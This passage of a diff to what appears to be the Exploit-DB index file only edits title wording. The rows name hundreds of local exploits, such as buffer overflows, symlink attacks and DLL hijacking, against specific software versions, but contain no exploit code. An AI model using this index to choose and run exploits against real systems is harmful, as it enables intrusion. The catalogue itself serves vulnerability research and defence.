Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0 -9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0 +9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit",2009-07-09,kingcope,multiple,local,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0 9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0 9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - 'ListData.dat' Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 @@ -6532,7 +6543,7 @@ id,file,description,date,author,platform,type,port 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Privilege Escalation",2009-12-16,"Dominick LaTrappe",linux,local,0 10544,platforms/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed '.M3U' Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 -10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 +10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (Windows XP Universal)",2009-12-19,loneferret,windows,local,0 10577,platforms/windows/local/10577.pl,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,windows,local,0 @@ -6697,7 +6708,7 @@ id,file,description,date,author,platform,type,port 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 -14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 +14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0 @@ -6744,7 +6755,7 @@ id,file,description,date,author,platform,type,port 14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14732,platforms/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0 -14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL",2010-08-24,TheLeader,windows,local,0 +14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local,0 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local,0 14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 @@ -6908,7 +6919,7 @@ id,file,description,date,author,platform,type,port 16141,platforms/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",windows,local,0 -16169,platforms/windows/local/16169.py,"Oracle 10/11g - exp.exe Parameter file Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 +16169,platforms/windows/local/16169.py,"Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 @@ -7170,7 +7181,7 @@ id,file,description,date,author,platform,type,port 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color Temporary file",1998-04-06,neonhaze,linux,local,0 19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - makebootdisk Temporary file",1998-04-06,neonhaze,linux,local,0 -19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT symlink",1998-04-10,"Joe H",linux,local,0 +19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT Symlink Exploit",1998-04-10,"Joe H",linux,local,0 19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig Temporary file",1998-04-06,neonhaze,linux,local,0 19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool Temporary file",1998-04-06,neonhaze,linux,local,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (1)",1998-05-05,jamez,linux,local,0 @@ -7201,7 +7212,7 @@ id,file,description,date,author,platform,type,port 19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local,0 -19192,platforms/windows/local/19192.txt,"Hancom Office 2007 - Reboot.ini Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 +19192,platforms/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 @@ -7228,17 +7239,17 @@ id,file,description,date,author,platform,type,port 19234,platforms/solaris/local/19234.c,"Solaris 7.0 cancel - Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0 19235,platforms/solaris/local/19235.txt,"Solaris 7.0 chkperm - Exploit",1996-12-05,"Kevin L Prigge",solaris,local,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 -19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 +19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink Exploit",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Exploit",1999-03-02,Arthur,linux,local,0 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - gnuplot Exploit",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd Exploit",1999-01-03,anonymous,linux,local,0 -19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 +19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink Exploit",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 -19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr Exploit",1997-05-09,"Jaechul Choe",irix,local,0 +19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit",1997-05-09,"Jaechul Choe",irix,local,0 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 @@ -7356,7 +7367,7 @@ id,file,description,date,author,platform,type,port 19533,platforms/solaris/local/19533.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0 -19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0 +19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 @@ -7374,7 +7385,7 @@ id,file,description,date,author,platform,type,port 19583,platforms/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19585,platforms/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug - Buffer Overflow",1999-11-02,UNYUN,windows,local,0 19590,platforms/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Buffer Overflow",1999-11-03,"Brock Tellier",unix,local,0 -19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Spoolss.exe DLL Insertion",1999-11-04,"Marc of eEye",windows,local,0 +19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Spoolss.exe' DLL Insertion",1999-11-04,"Marc of eEye",windows,local,0 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14b - Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0 19610,platforms/windows/local/19610.c,"IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 19633,platforms/windows/local/19633.txt,"Microsoft Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 @@ -7384,7 +7395,7 @@ id,file,description,date,author,platform,type,port 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink",1999-12-01,"Brock Tellier",freebsd,local,0 +19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0 19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 @@ -7394,7 +7405,7 @@ id,file,description,date,author,platform,type,port 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0 19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",sco,local,0 19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' command Exploit",1999-12-03,"Brock Tellier",sco,local,0 -19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",sco,local,0 +19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink Exploit",1999-12-03,"Brock Tellier",sco,local,0 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local,0 @@ -7415,16 +7426,16 @@ id,file,description,date,author,platform,type,port 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (2)",2000-03-15,"Elias Levy",linux,local,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 - GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",multiple,local,0 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 - get_it PATH",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 -19726,platforms/bsd/local/19726.c,"FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - /proc File Sytem",2000-01-21,Nergal,bsd,local,0 +19726,platforms/bsd/local/19726.c,"FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - '/proc' FileSystem Exploit",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) 3.4.11 - Buffer Overflow",2000-01-21,K2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 - Default Permissions",1999-12-29,"Frank Monroe",windows,local,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0 / Network Associates for Windows NT 4.0.2/4.0.3 a / Norton AntiVirus 2000 - Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 -19735,platforms/linux/local/19735.txt,"Debian 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 +19735,platforms/linux/local/19735.txt,"Debian 2.1 - apcd Symlink Exploit",2000-02-01,anonymous,linux,local,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 -19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink",2000-02-15,"Shawn Bracken",sco,local,0 +19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit",2000-02-15,"Shawn Bracken",sco,local,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0 -19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0 +19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink Exploit",2000-02-21,sp00n,solaris,local,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig Exploit",2000-02-24,suid,linux,local,0 @@ -7467,12 +7478,12 @@ id,file,description,date,author,platform,type,port 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - pam_console Exploit",2000-05-03,"Michal Zalewski",linux,local,0 19910,platforms/solaris/local/19910.c,"Solaris 2.6/7.0/8 netpr - Buffer Overflow (1)",1999-05-23,ADM,solaris,local,0 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 netpr - Buffer Overflow (2)",1999-03-04,ADM,solaris,local,0 -19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0 +19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink Exploit",2000-05-10,foo,multiple,local,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 -19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0 +19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink Exploit",2000-04-21,anonymous,linux,local,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 @@ -7480,14 +7491,14 @@ id,file,description,date,author,platform,type,port 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow",2000-05-29,noir,linux,local,0 -19970,platforms/linux/local/19970.c,"KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 +19970,platforms/linux/local/19970.c,"KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Exploit (1)",2000-05-31,kil3r,linux,local,0 19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Exploit (2)",2000-05-31,kil3r,linux,local,0 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 -19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 +19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0 @@ -7572,7 +7583,7 @@ id,file,description,date,author,platform,type,port 20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local,0 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0 -20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab - /tmp File",2000-10-20,"Kyong-won Cho",hp-ux,local,0 +20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File Exploit",2000-10-20,"Kyong-won Cho",hp-ux,local,0 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 @@ -7595,7 +7606,7 @@ id,file,description,date,author,platform,type,port 20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0 41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0 -20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 +20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0 20443,platforms/osx/local/20443.sh,"Tunnelblick - Privilege Escalation (2)",2012-08-11,zx2c4,osx,local,0 20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 @@ -7917,7 +7928,7 @@ id,file,description,date,author,platform,type,port 22325,platforms/unix/local/22325.c,"File 3.x - Local Stack Overflow Code Execution (2)",2003-03-04,lem0nxx,unix,local,0 22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0 -22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 +22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - 'Display' Parameter Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0 22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0 22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 @@ -7929,7 +7940,7 @@ id,file,description,date,author,platform,type,port 22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 - Symbolic Link Following Configuration File",2003-04-03,"Carl Livitt",linux,local,0 22458,platforms/linux/local/22458.c,"Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence",2003-04-04,"Andrew Griffiths",linux,local,0 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0 -22528,platforms/windows/local/22528.c,"Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 +22528,platforms/windows/local/22528.c,"Microsoft Windows Server 2000 - 'RegEdit.exe' Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 22531,platforms/linux/local/22531.pl,"SAP Database 7.3/7.4 - SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",linux,local,0 22538,platforms/linux/local/22538.pl,"Libopt.a 3.1x - Error Logging Buffer Overflow (2)",2003-04-24,jlanthea,linux,local,0 22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local,0 @@ -7955,7 +7966,7 @@ id,file,description,date,author,platform,type,port 22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing 